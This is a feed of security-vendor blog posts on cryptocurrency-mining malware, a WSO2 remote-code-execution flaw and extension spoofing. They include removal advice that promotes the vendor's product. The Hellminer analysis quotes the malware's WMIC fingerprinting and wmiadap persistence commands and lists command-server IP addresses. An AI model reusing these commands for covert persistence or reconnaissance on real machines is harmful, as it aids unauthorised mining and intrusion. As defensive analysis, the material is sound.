Coin Miner Archives – Gridinsoft Blog https://gridinsoft.com/blogs/tag/coin-miner/ Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe. Tue, 02 Apr 2024 01:20:04 +0000 en-US hourly 1 https://wordpress.org/?v=94807 200474804 Hellminer.exe Coin Miner https://gridinsoft.com/blogs/hellminer-exe-malware-analysis/ https://gridinsoft.com/blogs/hellminer-exe-malware-analysis/#respond Fri, 22 Mar 2024 15:51:29 +0000 https://gridinsoft.com/blogs/?p=20683 Hellminer.exe is a process you can see in the Task Manager that indicates a malicious software activity. It stands out by the high CPU load it creates, making the system much less responsive. Let’s figure out what this process is, and how to get rid of it. Hellminer malware has a potential to attack a… Continue reading Hellminer.exe Coin Miner

The post Hellminer.exe Coin Miner appeared first on Gridinsoft Blog.

]]>
Hellminer.exe is a process you can see in the Task Manager that indicates a malicious software activity. It stands out by the high CPU load it creates, making the system much less responsive. Let’s figure out what this process is, and how to get rid of it.

Hellminer malware has a potential to attack a wide range of devices, from IoT to server clusters. The final target of its activity is bringing profit to its masters with the use of your hardware. Ignoring the activity of this malicious program may lead to premature hardware failure and overall performance deterioration.

Modern malware samples often come in packs, meaning that one thing may signify the presence of several others. Do not hesitate with removal: scan your device with GridinSoft Anti-Malware and remove all the threats in one click. 👉🏼 Get your system cleaned up.

What is the Hellminer.exe process?

This is a process associated with a malicious coin miner. Such malware aims at exploiting the system’s hardware to mine cryptocurrencies, mainly DarkCoin and Monero. To maximize profits, hackers who stand behind this malware establish huge networks of infected computers. Hellminer takes up to 80% of CPU power in order to get substantial mining performance, making the system sluggish and uncomfortable to use.

Hellminer process Task Manager
Hellminer.exe process in Task Manager

Malicious miners like this one typically get into the user systems through malvertising on the Web, or with the use of dropper malware. Both spreading ways though are commonly used by other malware, which means the risk that Hellminer is not the only infection running in the system.

This malware appears to be different from other miners, as it is not based on XMRig, a popular open-source mining software. Instead, it appears to be written in Python, and is likely a private development. Let’s check out other interesting stuff I’ve found during the analysis.

Hellminer Malware Analysis

It is not completely clear how Hellminer gets into the system; I suspect it is not much different from how malware miners typically spread – via dropper malware and malvertising. After the launch, the malware begins with a selection of anti-VM and anti-debug checks.

Hellminer Execution chain

Using the calls to WMI, it gets the info about the CPU, trying to find any signs of virtualization. Why I don’t think it is just an immediate info gathering is because the very next step is listing the services and processes. Hellminer specifically seeks for traces of the VMWare virtualization environment. After these checks, the main payload is unfolded. Though, malware may as well use the info collected at this stage, to configure the mining process or as a part of the system fingerprint.

wmic cpu get Name,CurrentClockSpeed,L2CacheSize,L3CacheSize,Description,Caption,Manufacturer /format:list

Fingerprinting starts with another call to WMIC, wmic os get Version. Malware attempts to receive quite a basic, if not scarce, set of data – just the info about the operating system. After that, malware gains persistence through the manipulation with another command and series of changes in Windows registry.

%windir%\System32\svchost.exe -k WerSvcGroup – starting Windows error reporting service to make it run the malware. This increases the level of privileges the malicious program has, also providing it with a disguise.

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_IETLDLIST_FOR_DOMAIN_DETERMINATION

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security – changing network security policies.

The final round of persistence involves another call to WMI, specifically to its Adaptation Service. Hellminer forces it to recursively launch the payload, ensuring continuous execution. This specific command is also a part of resource allocation for the mining process.

wmiadap.exe /F /T /R

Command Server Connectivity

Same as other malware miners, Hellminer does not have any extensive C2 communication. After finishing the steps from the above, it sends the blob of system information to the command server, effectively notifying it about the readiness. C2 returns the configuration file, which specifies the mining pool and the IP address to connect to.

Still, there is a thing that catches an eye – the form of command servers used by this malware. They do not look like C2 of a classic model, instead being a peer-to-peer one. In such a network, the role of a command server is given to one of the infected computers. “Real” server sporadically communicates with one, retrieving the information about the new devices and assigning the next system to get the C2 role. This drastically increases the sustainability of the network, making it particularly hard to disrupt through the command server disruption.

During the analysis, I’ve detected these command servers:

  • 20.99.184.37:443
  • 20.99.186.246:443
  • 23.216.147.64:443
  • 192.229.211.108:80
  • 20.99.133.109:443

Hellminer.exe Removal Guide

Removing Hellminer malware requires anti-malware software scanning. Such threats typically duplicate itselves to numerous folders across the system, with each acting as a backup. GridinSoft Anti-Malware is what would remove the malicious miner and all its copies in the matter of minutes. Launch a Full Scan, and let it finish – this will make sure your system is as good as new.

Hellminer.exe Coin Miner

Miner malware activity always correlates with cryptocurrency prices. At the moment, they are on the rise, meaning that more and more frauds will opt for this malware. The typical ways of spreading for malicious miners is malvertising, particularly ones in search engines. Avoiding it requires user attention: they typically mimic legitimate sites that spread freeware, but always have a different, mangled URL.

The post Hellminer.exe Coin Miner appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/hellminer-exe-malware-analysis/feed/ 0 20683
Bitfiat Process High CPU – Explained & Removal Guide https://gridinsoft.com/blogs/bitfiat-process-high-cpu/ https://gridinsoft.com/blogs/bitfiat-process-high-cpu/#respond Wed, 28 Feb 2024 15:28:06 +0000 https://gridinsoft.com/blogs/?p=20018 Bitfiat is a malicious coin miner that exploits your computer’s hardware to mine cryptocurrencies. Such malware takes as much resources as it can, making the system impossible to use. Let’s see what this malware is, and how to remove it. Bitfiat Overview The Bitfiat process is related to the activity of a malicious coin miner.… Continue reading Bitfiat Process High CPU – Explained & Removal Guide

The post Bitfiat Process High CPU – Explained & Removal Guide appeared first on Gridinsoft Blog.

]]>
Bitfiat is a malicious coin miner that exploits your computer’s hardware to mine cryptocurrencies. Such malware takes as much resources as it can, making the system impossible to use. Let’s see what this malware is, and how to remove it.

Bitfiat Overview

The Bitfiat process is related to the activity of a malicious coin miner. Such malware uses your computer’s resources to mine cryptocurrencies, mainly Monero or DarkCoin. An unusual part about Bitfiat is its origins: it is based on its own technology rather than using XMRig code. This, however, is the last part where it is different from other malware miners – its behavior is as unpleasant as in other cases.

As for the symptoms, they are typical: it causes the CPU to run at maximum capacity, often reaching 100%. You may also notice that your computer’s fan runs at full speed even when you are not using any programs. Moreover, this process usually appears in Task Manager and consumes the most resources. Although coin miners usually don’t harm your files, they make your system unusable due to an overloaded CPU.

The Bitfiat process in Task Manager screenshot
The Bitfiat process in Task Manager

Bitfiat Virus Analysis

Despite having the origins different from the majority of malware miners, the infection chain of Bitfiat is pretty much the same. Let’s start from the very beginning and explore the operations of this malware. Fortunately, there are enough samples to analyze.

Spreading Methods

Bitfiat propagates through various channels, primarily leveraging cracked software and software activators “cracks”. These cracks are often distributed through illicit channels (like torrents) and online forums. It entices users with the promise of unlocking premium software features without needing to purchase. Even though it sounds like fairy tales, unwary users keep downloading such “free” premiums.

Another spreading way is botnets. By paying a coin to the masters of a botnet established with dropper malware, crooks can provide themselves with massive amounts of mining nodes. Thing is, after deploying the malware like a coin miner the entire malware spreading chain will be uncovered, and the dropper will be most likely removed from the machine. To maximize profits, miners are spread along with other “visible” malware, like ransomware or proxyware.

Launch, C2 Connection & Mining

The majority of Bitfiat samples do not have any detection evasion tricks. And, well, how can you evade the detection when your process takes up to 80% of the CPU? Right after launching, the malware performs an IP check, then collects some basic info about the system and connects to the command server.

Command servers used by Bifiat are rather unusual: there is no direct connection to the “main” C2. Instead, malware retrieves the needed instructions from the other infected machine, i.e. they operate like a p2p network. This provides much better stability, up to autonomous existence in the cases when the command server is unresponsive.

P2P architecture C2 Bitfiat

The said instructions in a form of config file contain the info about mining pool and crypto wallet address. After executing a few command prompt lines, it starts the mining process. And this is the point where the most noticeable sign of a malware miner activity appears – overloaded CPU and a strange process in the list of running programs.

How To Remove Bitfiat?

Effective removal of the crypto miner requires a complex approach to neutralize all malware actions. Unlike other types of malware, a miner can overload the system so that the removal tool has no resources left. To avoid these issues, the removal guide should have one more step.

  • Download and install GridinSoft Anti-Malware. The first thing to do is to deploy the removal tool, even though it will be used later.

Bitfiat Process High CPU – Explained & Removal Guide

  • Switch your Windows to Safe Mode with Networking. By booting into the Safe Mode with Networking, you prevent the Bitfiat process from exerting its influence on the CPU. This will facilitate uninterrupted removal by antivirus software.
  • Start the Full Scan. By running a Full Scan, you make the program check every single element of the system. Such a thorough scan is essential to ensure that all the malware present in the system is removed. After the scan, click “Clean Now” to get rid of all the detected items.

The post Bitfiat Process High CPU – Explained & Removal Guide appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/bitfiat-process-high-cpu/feed/ 0 20018
WinRing0x64.sys Process – What is It? Can I Delete? https://gridinsoft.com/blogs/winring0x64-sys-process/ https://gridinsoft.com/blogs/winring0x64-sys-process/#respond Wed, 21 Feb 2024 09:33:42 +0000 https://gridinsoft.com/blogs/?p=19829 WinRing0x64.sys is a low-level driver that is used by specific applications. The file is not malicious, though, but malware can abuse this driver. Next, we will find out who uses WinRing0x64.sys and why and answer the question of whether it can be removed. WinRing0x64 Overview WinRing0x64.sys is a crucial software component that allows applications to… Continue reading WinRing0x64.sys Process – What is It? Can I Delete?

The post WinRing0x64.sys Process – What is It? Can I Delete? appeared first on Gridinsoft Blog.

]]>
WinRing0x64.sys is a low-level driver that is used by specific applications. The file is not malicious, though, but malware can abuse this driver. Next, we will find out who uses WinRing0x64.sys and why and answer the question of whether it can be removed.

WinRing0x64 Overview

WinRing0x64.sys is a crucial software component that allows applications to gain low-level access to hardware components for system monitoring or overclocking purposes. It bypasses high-level interfaces provided by the operating system to interact directly with the hardware. This makes it essential for applications that require this type of access. Most often, this driver uses software that controls RGB backlighting. As a result, the process will appear in Task Manager.

Legit file properties screenshot
Legit file properties

It is essential to understand that WinRing0x64.sys is not malicious. Although it is generally safe and helpful for specific applications, it can pose potential risks if misused. For example, the ability for direct hardware access is exceptionally beneficial to malicious miners. As it allows access at such a low level, malicious software could exploit it to gain control over hardware components. And since it is a valid Windows driver, such a trick makes the malware more complicated to detect.

WinRing0x64.sys – What Software Uses It?

As I said above, WinRing0x64.sys is most often used by software for backlight control and hardware overclocking. Noriyuki MIYAZAKI, MasterPlus, EVGA Precision, and Intel Processor Diagnostic Tool are the most common programs. Since the algorithm of driver usage is similar to malware, some antivirus solutions erroneously block this driver.

This driver is not mandatory for Windows, so it can be removed. In practice, however, it is deactivated by uninstalling the software that uses the driver. Depending on the software, it may be located in a subfolder of “C:\” or sometimes in a subfolder of the user’s profile folder or the folder with the installed program. Although the driver does not have its window, it may appear in the running processes in Task Manager.

Is WinRing0x64.sys Malware?

Although WinRing0x64.sys is a legitimate driver, it is sometimes detected as a trojan. For example, some users complained about blocking winring0x64.sys by antivirus after installing EVGA Precision Overclocking software for graphics adapters. To understand whether a file is malicious or not, you need to compare some factors, such as how many resources the process consumes, whether any software needs this driver, etc.

Suppose you downloaded video card software from an official website, which is detected as a trojan. This is most likely a false positive. On the other hand, if you have a laptop with Intel HD graphics but there is WinRing0x64.sys in Task Manager, it is a reason to dig deeper. Although WinRing cannot load the system to 100%, it can allow other processes to do this. So, if a suspicious process on your system consumes an abnormal amount of resources and you see WinRing0x64.sys among running processes, this is a red flag. In such a case, I recommend running a full scan with Gridinsoft Anti-Malware.

Suspicious process in the task manager screenshot
Suspicious process in the task manager

WinRing0x64.sys Process – What is It? Can I Delete?

The post WinRing0x64.sys Process – What is It? Can I Delete? appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/winring0x64-sys-process/feed/ 0 19829
Aluc Service: What Is Aluc App & How to Remove? https://gridinsoft.com/blogs/aluc-service-how-to-remove/ https://gridinsoft.com/blogs/aluc-service-how-to-remove/#comments Wed, 11 Oct 2023 09:02:51 +0000 https://gridinsoft.com/blogs/?p=17182 Aluc Service is a strange service you can spectate in the Task Manager. It is, in fact, a malware-related process that hides behind a legitimately-looking name. Most commonly, such a trick is done by coin miner malware and rootkits. What is Aluc Service? At a glance, Aluc Service may look like a legit service among… Continue reading Aluc Service: What Is Aluc App & How to Remove?

The post Aluc Service: What Is Aluc App & How to Remove? appeared first on Gridinsoft Blog.

]]>
Aluc Service is a strange service you can spectate in the Task Manager. It is, in fact, a malware-related process that hides behind a legitimately-looking name. Most commonly, such a trick is done by coin miner malware and rootkits.

What is Aluc Service?

At a glance, Aluc Service may look like a legit service among hundreds of ones running in Windows. However, even a tiny bit of research shows that it is not something common. No programs among well-known ones have their service named in such a manner. Moreover, users commonly report that it consumes significant amounts of CPU power. This makes me assume that it is most likely related to coin miner malware activity.

Aluc Service Reddit
User complains on Aluc Service consuming a lot of CPU power

But why would malware take the disguise of a service? Well, the vast majority of malware does this trick – hooking up to a system service to make itself run without any permissions. The thing is, not much other malware takes as much CPU power as coin miners do. While a strange service launched by spyware will remain unnoticed, miners would not – quite an easy math here.

Aluc Service – Is It Dangerous?

The main issue coin miners like Aluc Service create is system overloading. Such pieces of software do not care whether you want to use your computer and what for – they will take 60-80% of your CPU power. By connecting hundreds and thousands of infected machines to a mining pool, hackers provide themselves with a free mining farm. Even though mining crypto on a CPU is inefficient, the amount of processors involved covers possible performance issues. Moreover, crooks commonly opt for coins with a less complicated blockchain, like Monero or DarkCoin.

However, an overloaded system is not a single issue here. Hackers who work with coin miners often use the services of dropper malware. That means you can have one more malware – or even several if other hackers used the same dropper to deliver their payloads. Possibly, there could be several other malicious things in your system, and they are much more stealthy than the coin miner is.

How did I get infected?

There could be a lot of possible ways of getting infected, but hackers commonly opt for a couple of the most cost- and effort-efficient methods. Among them are email spam, software cracks, and search results hijacking. Two former can spread pretty much any malware, while the latter is a common basis for multi-staged attacks. Droppers I mentioned above prefer to sneak as fake software installers, and then perform all the dirty deeds.

A screenshot of a fake email from X
Fake email from X – it can throw you to a phishing site as well as to malware downloading

That being said, it is important to keep in mind that cybercriminals seek new opportunities pretty much constantly. Hackers adjust their attack campaigns correspondingly to the circumstances, so it is tough to know what you should be prepared for.

How to remove Aluc Service?

Removing such things manually is not the best idea. Malware that exploits service creation for persistence can sometimes protect them, so attempts to remove it by simply stopping & deleting may end up with a BSOD. Moreover, you can see the Aluc Service running, but can be missing all other threats present in your system. For that reason, a scan with a proper anti-malware program is recommended. GridinSoft Anti-Malware is an anti-malware program that will make this problem sorted in 10 minutes.

Aluc Service: What Is Aluc App & How to Remove?

How to stay safe online?

Based on the spreading methods and injection approaches I mentioned before, it is not hard to create a list of effective ways to avoid malware infections.

Be cautious with email spam. There are several places to watch out for:

  • Verify Sender. Never open email attachments or click on links in emails from unknown or suspicious senders. Verify the sender’s identity if you’re unsure.
  • Check for Spelling and Grammar. Be wary of emails with poor grammar and spelling, as these are often red flags for phishing attempts.
    Avoid Pop-Up Promotions. Don’t click on pop-up promotions or offers in emails, especially those that seem too good to be true.

Steer clear of software cracks. Their hazards are not only about malware but also about legal consequences for breaking the copyright law.

  • Use Legitimate Sources. Only download software and applications from reputable sources and official websites. Avoid using cracked or pirated software, as these often come bundled with malware.
  • Regularly Update Software. Keep your operating system, software, and antivirus programs up to date. Updates often include security patches that protect against vulnerabilities.

Protect against search engine hijacks. There, your attention and checkups are king.

  • Avoid Clicking Search Result Ads. Google, along with other search engine providers, embeds advertisements at the top of its search results. As users tend to choose top results, they click promoted sites, without thought it may be a malicious link.
  • Verify Search Results. Before clicking on a search result, review the URL and ensure it looks legitimate. Avoid clicking on suspicious links.

Employ anti-malware software. A well-done security solution, like GridinSoft Anti-Malware, will serve for both proactive and reactive protection.

  • Install Reliable Security Software: Use a reputable antivirus and anti-malware program on your computer and keep it updated. Schedule regular scans of your system.
  • Enable Real-Time Protection: Activate real-time protection features to prevent malware from executing on your system.

The post Aluc Service: What Is Aluc App & How to Remove? appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/aluc-service-how-to-remove/feed/ 2 17182
KmsdBot malware combines DDoS-attacks and coin mining https://gridinsoft.com/blogs/kmsdbot-malware-ddos-coin-mining/ https://gridinsoft.com/blogs/kmsdbot-malware-ddos-coin-mining/#respond Mon, 14 Nov 2022 19:04:32 +0000 https://gridinsoft.com/blogs/?p=11838 A new malware, called KmsdBot, strikes user devices. The Akamai SIRT has discovered a new malware that uses the SSH (Secure Shell) protocol to infiltrate target systems in order to mine cryptocurrency and carry out DDoS attacks. It spreads disguised as a bot for popular games, in particular, GTA V. The combined threat raises malware… Continue reading KmsdBot malware combines DDoS-attacks and coin mining

The post KmsdBot malware combines DDoS-attacks and coin mining appeared first on Gridinsoft Blog.

]]>
A new malware, called KmsdBot, strikes user devices. The Akamai SIRT has discovered a new malware that uses the SSH (Secure Shell) protocol to infiltrate target systems in order to mine cryptocurrency and carry out DDoS attacks. It spreads disguised as a bot for popular games, in particular, GTA V. The combined threat raises malware analysts’ concerns about the possible massive spreading of such malware.

KmsdBot strikes, using security vulnerabilities

The experts called the malware KmsdBot. It is developed on the basis of Golang and is aimed at various companies – from gaming to automotive brands and security firms. GoLang gains popularity among malware developers, as it is quite hard to reverse engineer this language. The botnet infects systems via an SSH connection using “weak” login credentials. KmsdBot does not remain persistent on the infected system to avoid detection.

The malware gets its name from the “kmsd.exe” executable, which is downloaded from a remote server after a successful compromise. It is also designed to support multiple architectures – Winx86, Arm64, mips64 and x86_64. KmsdBot can perform scan and self-propagation operations by downloading a list of username/password combinations. The botnet is also able to control mining processes and malware updates. The control is possible through the communications with C2 server.

Command for attack kmsdbot
Command for KmsdBot to attack the target server, sent from the C2

According to Akamai, the first detected target of KmsdBot was the gaming company FiveM, a multiplayer mod for GTA V that allows players to access custom role-playing servers. Botnet DDoS attacks include OSI Layer 4 and 7 attacks, in which a flood of TCP, UDP, or HTTP GET requests are sent to overwhelm the target server’s resources and bring it into a denial of service state. It is noteworthy that the KmsdBot botnet began as a bot for a gaming application, but turned into a tool for attacking worldwide-known names.

Is KmsdBot dangerous?

As any other malware, KmsdBot is not a pleasant addition to the infected system. It brings coin mining and DDoS capabilities, which creates enough problems with PC usage, regardless of the task. Mining supposes high hardware utilisation rates, which makes it problematic even to use basic apps. DDoS attacks, on the other hand, not just take a lot of bandwidth, but can also lead to bans for the IP address of an infected PC on the attacked sites.

The other edge of danger for this malware is the way it spreads into the users’ computers. Aside from the fact that exploitation is not a typical thing for malware that aims at single users, it also opted for a disguise of a bot for the game – GTA V. Gamers are known as not the most careful users, as they are the common public for cracks, patches, and different automatisation tools like bots. Since GTA V is not the sole game that makes the bot usage profitable, it will be obvious to see the KmsdBot spreading surge in the nearest weeks.

The post KmsdBot malware combines DDoS-attacks and coin mining appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/kmsdbot-malware-ddos-coin-mining/feed/ 0 11838
Extension spoofing strikes Spanish-speaking countries https://gridinsoft.com/blogs/extension-spoofing-spanish-speakers/ https://gridinsoft.com/blogs/extension-spoofing-spanish-speakers/#respond Tue, 07 Jun 2022 17:02:55 +0000 https://gridinsoft.com/blogs/?p=8348 An old-good form of malware disguisment sparked recently in several Spanish-speaking countries across the globe. Users note numerous cases of email attachments with spoofed file extensions, that appear to be coin miner trojans. Massive outbreak of extension spoofing in email spam Email spam is a form of malware spreading that became very popular at the… Continue reading Extension spoofing strikes Spanish-speaking countries

The post Extension spoofing strikes Spanish-speaking countries appeared first on Gridinsoft Blog.

]]>
An old-good form of malware disguisment sparked recently in several Spanish-speaking countries across the globe. Users note numerous cases of email attachments with spoofed file extensions, that appear to be coin miner trojans.

Massive outbreak of extension spoofing in email spam

Email spam is a form of malware spreading that became very popular at the edge of the current decade. It was used earlier as well, but with a much smaller scale. This spreading way may fit different needs – from massive spamming without target selection to spear phishing against the corporation employees. In modern practices, email spam usually contains something that makes the victim believe in the legitimacy of this letter. Background similar to the one used by FedEx, some routine patterned words about the incoming delivery – and voila – user believes you. After gaining your trust, they will try to trick you into following the link, or opening the attached file – the latter usually contains malware. The former, however, may lead the victim to the phishing page, or to the exploit site, where crooks will try to install malware.

Hence, if attaching the malware was not something new – what is the reason to wonder about the new wave? Hundreds of them happen each day, so they do not look like something worth attention. The peculiar item about those attacks is that they apply the use of extension spoofing techniques in order to disguise the attached file. That approach was not seen for a long time – but it popped up, again.

What is extension spoofing?

Extension spoofing is a trick with file names that visually changes the file format. It is based on Windows default settings of file extension display. By default, you see only the filenames – without extensions. When you spectate the opened folder in a list view mode, you’d likely fail to see the file icons. Therefore, you can add the extension you want to the end of your file, but in fact leaving it unchanged.

Extension spoofing
Here is how extension spoofing looks like

For example, you can make the batch script file and name it as “tuxedo-cat.png.bat”. Users will see it as “tuxedo-cat.png”, but in fact it will be the batch file that will run as soon as you’d try to open it. Moreover, low-skill users may easily miss the second extension, thinking that the first one is original. That trick is very old, but still effective – especially with the latest visual updates in Windows.

Who is under attack?

Most of the spectated cases appear in Spanish-speaking countries. Users from Mexico, Chile, Ecuador and, exactly, Spain reported the appearance of routinely looking emails with attached files. The latter had the naming like “confiromidad entrega material ].xlsx.exe or “resumenes info socioeco.xlsx.exe”. As you can see, the extension spoofing there has its easiest form – the one you can uncover by just seeing the detailed information about the file. However, the victims were tricked by the file names – they were too similar to the documents you work with everyday.

Email spam
The example of the message with malicious attachment. This file mimics the legit MS Word file

In those files, the coin miner virus is hiding. When you are trying to open this file, thinking it is legit, you will see no effects. But in the background, malware starts its nasty job. Coin miners, as you can suppose by the name, exploit your hardware to mine cryptocurrencies. Contrary to legit miners that you can install these do not let you to set how much hardware power they can use. You will see your CPU and GPU overloaded, so the PC will be barely operable.

How to prevent extension spoofing and email spam?

There is not a lot you can do about the exact email spam. Mailing will be possible until you have an active email account. However, you can do a lot to make the spam much less relevant and thus less believable.

  • Don’t spread any personal information. Crooks use it in spear phishing campaigns, which supposes creating a very realistic disguise. To make their task impossible, just don’t spread your routine mailing screenshots, info about your incoming shipments and so on.
  • Use a separate email account for work mailing and your personal needs. Seeing a work-related mail on your personal mailbox can instantly show that you are spectating the fraudulent message. During the initial target reconnaissance, crooks will likely fail to designate that these emails have different purposes.
  • Extension spoofing is much easier to prevent. There are techniques which allow the crooks to mask the file in a more reliable way, but they are rarely used these days. Most cases can easily be mirrored with simple diligence.

  • Check-up the file extensions. That advice may sound like a truism, nonetheless it is a bad idea to deny its effectiveness. Seeing doubtful things like “wallpaper.jpg.exe” or “report.xlsx.ps2” must be the trigger to your vigilance.
  • Enable the extensions displaying. By default, in fresh Windows installations and/or new user profiles you will have the file extensions hidden. That option makes the fraud possible, as I have shown you above. Enable it in File Explorer: go to View→Show→Show file extensions. That simple step is enough to uncover the tricks.
  • Enable extensions

  • Use anti-malware software.There is no more effective and easy way to mirror the malware attack than using the anti-malware solution. It is capable of monitoring the incoming files even before you’d try to open it. Hence, cybercriminals who apply these tricks will have no chance.

    The post Extension spoofing strikes Spanish-speaking countries appeared first on Gridinsoft Blog.

    ]]> https://gridinsoft.com/blogs/extension-spoofing-spanish-speakers/feed/ 0 8348 Clipminer – a Million Dollar Clipboard Hijacking Coinminer https://gridinsoft.com/blogs/clipminer-coinminer/ https://gridinsoft.com/blogs/clipminer-coinminer/#comments Fri, 03 Jun 2022 22:43:39 +0000 https://gridinsoft.com/blogs/?p=8295 Clipminer Malware A bizarrely efficient botnet cryptocurrency miner has been revealed by Symantec security experts. Besides its classic mining function, it has a feature of clipboard hijacking, thence comes the name of this malware – “Clipminer.” That feature alone has brought its developers approximately $1.7M. Let’s begin with the insertion. The Trojan-carried WinRAR archive originates… Continue reading Clipminer – a Million Dollar Clipboard Hijacking Coinminer

    The post Clipminer – a Million Dollar Clipboard Hijacking Coinminer appeared first on Gridinsoft Blog.

    ]]>
    Clipminer Malware

    A bizarrely efficient botnet cryptocurrency miner has been revealed by Symantec security experts. Besides its classic mining function, it has a feature of clipboard hijacking, thence comes the name of this malware – “Clipminer.” That feature alone has brought its developers approximately $1.7M.

    Let’s begin with the insertion. The Trojan-carried WinRAR archive originates from untrustworthy software downloads and self-extracts to activate a downloader via an executable DLL with a CPL extension. The film establishes a connection to Tor, and thus the assembly of the miner goes on. When the system is not in use, the malware activates the XMRig miner. Such selectivity allows for keeping the activity of the miner lowkey. The right time is when the movement of the mouse ceases and no keystrokes are detected. The malware will deploy a different mining program if the targeted computer has a graphics processing unit.

    Clipminer – a Million Dollar Clipboard Hijacking Coinminer

    What Clipminer does besides stealing the targeted PC’s resources to throw them at cryptocurrency mining is that: it takes over a victim’s system’s clipboard. As soon as the user copies to the clipboard anything that resembles details of a cryptocurrency wallet (to send coins there), the Clipminer substitutes the desired numbers with one of the many account numbers at the disposal of crooks. The user hardly notices the replacement, let alone if there were many wallets, which would allow the felons to pick visually similar lines of characters. And there are! More than 4 thousand wallets are at the disposal of the criminals behind the malware in question, with over 3 thousand of these accounts supporting just the three types of Bitcoin. Clipminer recognizes at least 12 different cryptocurrency types. In the first days of June 2022, BTC and ETC wallets contained less than 34.3 and 129.9 coins, respectively.

    The amount of $1.7M mentioned above includes the crypto passed through the so-called cryptocurrency tumblers, where coins from different places are being mixed so that it becomes impossible to trace whence they came.

    The post Clipminer – a Million Dollar Clipboard Hijacking Coinminer appeared first on Gridinsoft Blog.

    ]]>
    https://gridinsoft.com/blogs/clipminer-coinminer/feed/ 1 8295
    A WSO2 Vulnerability is Fraught with Remote Code Execution https://gridinsoft.com/blogs/vso2-rce-vulnerability/ https://gridinsoft.com/blogs/vso2-rce-vulnerability/#respond Tue, 31 May 2022 22:04:00 +0000 https://gridinsoft.com/blogs/?p=8197 The products by WSO2, an open-source API, applications, and web services provider, have been attacked in the wild through the CVE-2022-29464 vulnerability detected back in April 2022. This vulnerability allows attackers to execute malicious code remotely via unhindered file uploading. The scheme of the attack begins with web shell installation through *.jsp or *.war files… Continue reading A WSO2 Vulnerability is Fraught with Remote Code Execution

    The post A WSO2 Vulnerability is Fraught with Remote Code Execution appeared first on Gridinsoft Blog.

    ]]>
    The products by WSO2, an open-source API, applications, and web services provider, have been attacked in the wild through the CVE-2022-29464 vulnerability detected back in April 2022.

    This vulnerability allows attackers to execute malicious code remotely via unhindered file uploading.

    The scheme of the attack begins with web shell installation through *.jsp or *.war files upload taking advantage of the CVE-2022-29464 vulnerability. As the web shell is installed, the attacker executes an arbitrary Java process with its help.

    RELATED: Microsoft warns of growing number of attacks using web shells.

    Attack scheme
    Scheme of the attack. Image: Trend Micro

    The results of the attack are the installation of a coin miner and Cobalt Strike beacon (backdoor.) The cryptocurrency miner is installed via the Java-process-launched wget command that installs the auto.sh file (the miner itself.) In the meantime, another part of the attack happens, also via the web shell. Java process calls a chmod command that modifies permissions to make it possible to run the process entitled “LBcgqCymZQhm” all through the same Java process. The process establishes an outbound connection to an IP address 179[.]60[.]150[.]29[.]4444, earlier tracked as a location involved in numerous Cobalt Strike attacks. Therefore, the LBcgqCymZQhm process is a Cobalt Strike backdoor beacon.

    The most interesting thing is that the Cobalt Strike beacon, initially designed for Windows, turned out to be working on Linux during these attacks. That means the hackers have purposefully worked upon the backdoor’s compatibility with Linux.

    The vulnerable software includes WSO2 API Manager 2.2.0 and above, Identity Server 5.2.0 and above, Identity Server Analytics 5.4.0 -5.6.0, Identity Server as a Key Manager 5.3.0 and above, Open Banking AM 1.4.0 and above, and Enterprise Integrator 6.2.0 and above. The patch is already there, so all users of the mentioned programs are advised to patch the flaws in question ASAP.

    The multiple WSO2 clients belong to many industries, vital ones included. For example, healthcare, financial sector, energy, education, communications, and government. Needless to say, should the hackers exploit the CVE-2022-29464 vulnerability against unpatched systems, the consequences of the attack could be drastic.

    A WSO2 Vulnerability is Fraught with Remote Code Execution

    The post A WSO2 Vulnerability is Fraught with Remote Code Execution appeared first on Gridinsoft Blog.

    ]]>
    https://gridinsoft.com/blogs/vso2-rce-vulnerability/feed/ 0 8197
    What is the worst computer virus? Figuring out https://gridinsoft.com/blogs/worst-computer-virus/ https://gridinsoft.com/blogs/worst-computer-virus/#respond Wed, 27 Jan 2021 14:41:37 +0000 https://gridinsoft.com/blogs/?p=6711 Worst computer virus – what is it? Seems that anyone who has ever been infected asks this question. And each user will think that his case was more severe than someone’s else. Is that true? And which virus is really the worst? It is important to mention that computer viruses are not only “viruses”. Nowadays,… Continue reading What is the worst computer virus? Figuring out

    The post What is the worst computer virus? Figuring out appeared first on Gridinsoft Blog.

    ]]>
    Worst computer virus – what is it? Seems that anyone who has ever been infected asks this question. And each user will think that his case was more severe than someone’s else. Is that true? And which virus is really the worst?

    It is important to mention that computer viruses are not only “viruses”. Nowadays, the term “computer viruses” is used to describe all types of malicious programs. But, in fact, viruses are just the type of malware – same as backdoors, coin miners, spyware or ransomware. You can read more about why that happened in our article.

    The worst computer virus – what is it like?

    First, let’s figure out what is meant by the term “the worst computer virus”. Different malware deals different kinds of damage, and it is always unwanted. Viruses can damage your networking configurations, system settings, cipher your files or even break your hardware. But the most dangerous ones considerably deal damage to all elements of your system. Some of such malware aims at making money on you, others – just to make your life harder. Let’s see the top-5 list of the worst computer virus – starting from less dangerous.

    5th position. Coin miner trojan

    This malware uses your hardware to mine cryptocurrencies, exactly, Monero and DarkCoin. What is the risk for your computer? First of all, it creates a significant load on your hardware – almost 70-90% on both CPU and GPU. That can easily lead to overheating, which never causes a positive impact on the lifespan of your hardware. Moreover, the GPU wear ratio is much higher when it is used for cryptomining purposes. The biggest danger is on laptops – their cooling system is not designed to deal with constantly overloaded hardware.

    Worst computer virus: Coin miner consumes the 95% of CPU capacity
    Coin miner consumes more 60% of CPU power. Antiviruses cannot work properly in such conditions

    Another side of the problem is that modern coin miner trojans sometimes have a spyware module. It means that your personal data will not be personal anymore – read the next paragraph.

    4th place. Spyware.

    Spyware is designed to steal all possible personal information from the victims’ PCs. Location, language setups, cookie files, search history, activity hours data – even your PC configuration will be leaked to the crooks. Depending on the type of attack – massive or individual – this information will be sold to third parties or used for further cyber attacks. Spyware is extremely silent – it tries to stay in your system as long as possible to get more personal information about you. Most examples of this malware type are also able to steal your conversations – so don’t be surprised when you’d see some very private information available for everyone.

    Worst computer virus: Spyware scheme
    The scheme of spyware virus actions

